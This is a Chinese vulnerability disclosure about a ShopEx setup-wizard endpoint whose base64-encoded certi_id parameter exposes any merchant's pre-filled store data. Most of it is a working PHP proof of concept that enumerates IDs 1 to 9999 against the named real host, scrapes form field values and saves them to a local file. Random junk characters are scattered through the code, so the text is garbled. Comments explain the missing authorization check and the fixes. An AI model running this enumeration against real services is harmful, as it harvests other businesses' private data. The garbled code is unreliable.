|
简要描述:
ShopEx某接口缺陷，可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面。
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}（只是 base64 编码而非加密，客户端可任意构造）
修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站——服务端未校验请求方是否有权访问该 certi_id，属于缺少对象级授权检查。
<?php
! ^% S0 ?8 f! @ b
// Driver for the PoC: one request per certi_id, 1..9999, sequentially.
// NOTE(review): from the server's side, a single client walking consecutive
// certi_id values is the detection signal for this enumeration; per-id
// authorization and rate-limiting on the endpoint are the mitigations.
( j3 f# `) ^5 r7 [( W7 r for ($i=1; $i < 10000; $i++) { // enumerate certi_id values
( n# r! [0 [% R/ F
4 S# U2 b3 g1 }( p/ M1 D ShowshopExD($i);
) c( s8 p& b/ k, \2 s. @& T0 Z G7 o' i6 v" q+ v! V3 H1 n T
}
% m: Y/ q. F6 R1 m
/**
 * Proof-of-concept from the report above: requests the ShopEx store-setup
 * wizard page for one certi_id and dumps every <input type="text"> name/value
 * pair found in the response to stdout and to c:/shopEx.txt.
 *
 * Root cause being demonstrated: the wizard identifies the store purely by
 * the certi_id inside the client-supplied, base64-encoded `refer` parameter.
 * The request carries nothing that proves the caller owns that id, so any
 * integer returns another merchant's pre-filled form data — a missing
 * object-level authorization check. The fix belongs on the server: bind
 * certi_id to an authenticated session or to a server-signed token and
 * rate-limit the endpoint; the client-side encoding alone is irrelevant.
 *
 * @param int|string $cid certi_id to query; normalised with intval() below
 * @return void results go to stdout and the local file only
 */
, h7 W' A% p' P! O, M. d! o function ShowshopExD($cid) {
' n( j0 W4 @( g8 [0 M4 K% e) V. |7 | m8 w- T* p2 o+ Y
$url='http://guide.ecos.shopex.cn/step2.php';/ c C \9 P; t$ O/ R2 O
$ k1 w# a- D" U+ J6 |4 M P
// refer is plain base64(JSON): no MAC and no server-issued nonce, so the
// caller chooses certi_id freely. callback_url is a dummy value here.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
: ]9 {6 C* p8 W. H8 W2 G0 S; F4 g* H/ ~* p) _; V
$url = $url.'?refer='.$refer;
- {7 u# x# p, \. w5 w- e( L: z* ~9 D Z, u
$ch = curl_init($url);
: n5 T5 Z+ }4 k" z/ P; U. d+ K" Q' k; Z$ B9 z+ q
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
5 J8 s, ` _! ]" O' B, ~" |% C2 A9 V% s2 Z) G) L- G3 Z0 i
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;: G) e) X# r X
+ i6 h, M: a. b; t/ N
$result = curl_exec($ch);- {; H- ]* j: j! ]- o
// Response body is transcoded UTF-8 -> GB2312 before matching; the regexes
// below therefore run on GB2312 bytes (presumably so Chinese field values
// print readably on a GB2312 console — confirm).
z$ q: i9 O% T* Y# G! u; \+ M w $result = mb_convert_encoding($result, "gb2312", "UTF-8");
/ o: S: [( d) q: ~) G; `6 ?, P1 c! `' e5 X
// A page that echoes our refer value back is treated as a hit; only then
// are its form fields harvested.
if(strpos($result,$refer))
2 K! d" Q7 y9 b! L3 H% R2 r! L9 l; F3 g
{2 x$ R- f- w+ u! d
+ A+ s3 R& P5 C* D7 k' a9 O7 B
$fp = fopen("c:/shopEx.txt",'ab'); // append this store's fields to a local results file
+ |& G; }, [( _( w) O
// Every <input type="text" .../> on the wizard page; group 1 is the rest of
// the tag's attribute string.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
. T7 L% P. I; G/ j% A/ G5 }
x! C, k4 l+ G7 p+ Z8 [ C1 f foreach ($value[1] as $key) {
1 a ^% d# ^7 V( F' I+ D" n* J$ V! T
// Extract name="..." (group 1) and value="..." (group 3) from the attribute
// string; only the first match per tag ([0]) is used.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
$ J, {/ n. _3 N! j+ k X( B: W7 N/ t8 P# O9 C# e. Z6 t( _
echo $res[1][0].':'.$res[3][0]."\r\n";
. |8 M8 l# y' [6 X4 B0 k
: C6 M3 J6 `% U $col =$res[1][0].':'.$res[3][0]."\r\n";
: h* h) W! p& n/ i. l& m
7 w% |" n$ T8 z- g- @ fwrite($fp, $col, strlen($col)); + X2 B: l5 [! N; K
) M' ]9 d/ P2 @, Y, _ }
; B i# `5 X/ q7 \7 X' D- Q$ G* p% n% h
echo '--------------------------------'."\r\n"; // separator between stores
& x/ s z4 p2 |# d2 h) \( c e0 V' H0 k9 }# Q# [7 ?4 k& F7 l
fclose($fp);
% O1 m, S% M. K+ s6 X7 P% L, j9 A7 c# u& Q S/ _. @0 J
}
, Z- d) l' d( W( C$ R# e9 }
// Push buffered output so progress is visible while the outer loop runs.
- ^: t1 S! x, u! ~% I- c* K flush();
* N% ~+ j2 o9 z
9 P; L2 ^0 O; P: @ curl_close($ch);; k/ Z" a1 }$ D. ]# F O: ]2 P
" C) c& r& h0 v) {, o4 p0 e3 a }, e7 P- c, v( N
; D* q0 \) a9 O/ b8 H. Z?>- Y" d: E1 O1 ~; M C: _* }
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式（仅加密或签名 refer 仍不够，服务端还应校验 certi_id 是否属于当前请求方，并对该接口做限流）
|
|